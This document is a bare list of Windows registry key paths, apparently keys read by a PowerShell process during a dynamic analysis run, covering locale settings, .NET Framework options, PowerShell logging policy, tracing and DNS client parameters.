HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\moh-CA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\moh-CA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\br
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\br
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\br-FR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\br-FR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ug
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ug
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ug-CN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ug-CN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\mi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\mi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\mi-NZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\mi-NZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\oc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\oc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\oc-FR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\oc-FR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\co
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\co
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\co-FR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\co-FR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\gsw
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\gsw
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\gsw-FR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\gsw-FR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sah
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sah
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sah-RU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sah-RU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\qut
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\qut
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\qut-GT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\qut-GT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\rw
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\rw
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\rw-RW
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\rw-RW
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\wo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\wo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\wo-SN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\wo-SN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\prs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\prs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\prs-AF
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\prs-AF
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\gd
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\gd
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\gd-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\gd-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\zh-TW
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\zh-TW
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\es-ES_tradnl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\es-ES_tradnl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\iu-Cans-CA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\iu-Cans-CA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\qps-ploc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\qps-ploc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000501
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\Alternate Sorts\00000501
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\qps-ploca
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\qps-ploca
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\000005FE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\Alternate Sorts\000005FE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ar-IQ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ar-IQ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\de-CH
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\de-CH
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\es-MX
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\es-MX
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fr-BE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fr-BE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-CH
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-CH
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\nl-BE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\nl-BE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\nn-NO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\nn-NO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\pt-PT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\pt-PT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sr-Latn-CS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sr-Latn-CS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sv-FI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sv-FI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\az-Cyrl-AZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\az-Cyrl-AZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\dsb-DE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\dsb-DE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\se-SE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\se-SE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ms-BN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ms-BN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\uz-Cyrl-UZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\uz-Cyrl-UZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\bn-BD
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\bn-BD
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\mn-Mong-CN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\mn-Mong-CN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\quz-EC
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\quz-EC
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\qps-plocm
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\qps-plocm
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Dynamic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Dynamic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment\__PSLockdownPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\PipelineMaxStackSizeMB
HKEY_CURRENT_USER\Software\Classes\AppID\powershell.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\DefaultAccessPermission
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging\EnableScriptBlockLogging
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\EventLog\ProtectedEventLogging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallationType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\HWRPortReuseOnSocketBind
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.UseHttpPipeliningAndBufferPooling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\UseHttpPipeliningAndBufferPooling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.UseSafeSynchronousClose
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\UseSafeSynchronousClose
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.UseStrictRfcInterimResponseHandling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\UseStrictRfcInterimResponseHandling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Uri.AllowDangerousUnicodeDecompositions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\AllowDangerousUnicodeDecompositions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Uri.UseStrictIPv6AddressParsing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\UseStrictIPv6AddressParsing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Uri.AllowAllUriEncodingExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\AllowAllUriEncodingExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\SchUseStrongCrypto
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.SchSendAuxRecord
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\SchSendAuxRecord
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\SystemDefaultTlsVersions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.RequireCertificateEKUs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\RequireCertificateEKUs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.3.0.Microsoft.PowerShell.Commands.Utility__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.3.0.Microsoft.PowerShell.Commands.Utility__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Web.Extensions__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Web.Extensions__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml.Linq__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml.Linq__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Web__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Web__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EnableConsoleTracing
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\powershell_RASAPI32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\LegacyWPADSupport
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\MaximumAllowedAllocationSize
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DnsCache\Parameters
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DNS
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DomainNameDevolutionLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DomainNameDevolutionLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\PrioritizeRecordData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\PrioritizeRecordData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\PrioritizeRecordData
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AppendToMultiLabelName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AppendToMultiLabelName
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenBadTlds
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenBadTlds
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenUnreachableServers
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenUnreachableServers
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenDefaultServers
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenDefaultServers
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DynamicServerQueryOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DynamicServerQueryOrder
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\FilterClusterIp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\FilterClusterIp
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\WaitForNameErrorOnAll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\WaitForNameErrorOnAll
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseEdns
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseEdns
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DnsSecureNameQueryFallback
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsSecureNameQueryFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableDAForAllNetworks
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\EnableDAForAllNetworks
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DirectAccessQueryOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DirectAccessQueryOrder
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\QueryIpMatching
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\QueryIpMatching
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseHostsFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseHostsFile
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AddrConfigControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AddrConfigControl
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableDynamicUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterPrimaryName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterPrimaryName
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterReverseLookup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterReverseLookup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableReverseAddressRegistrations
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterWanAdapters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterWanAdapters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableWanDynamicUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DefaultRegistrationTTL
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DefaultRegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UpdateTopLevelDomainZones
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UpdateTopLevelDomainZones
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DowncaseSpnCauseApiOwnerIsTooLazy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DowncaseSpnCauseApiOwnerIsTooLazy
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationOverwrite
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationOverwrite
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCacheTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCacheTtl
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxNegativeCacheTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxNegativeCacheTtl
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AdapterTimeoutLimit
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AdapterTimeoutLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ServerPriorityTimeLimit
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ServerPriorityTimeLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCachedSockets
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCachedSockets
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableMulticast
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastResponderFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastResponderFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastSenderFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastSenderFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastSenderMaxTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastSenderMaxTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsTest
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseCompartments
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\CacheAllCompartments
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseNewRegistration
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ResolverRegistration
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ResolverRegistrationOnly
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsQueryTimeouts
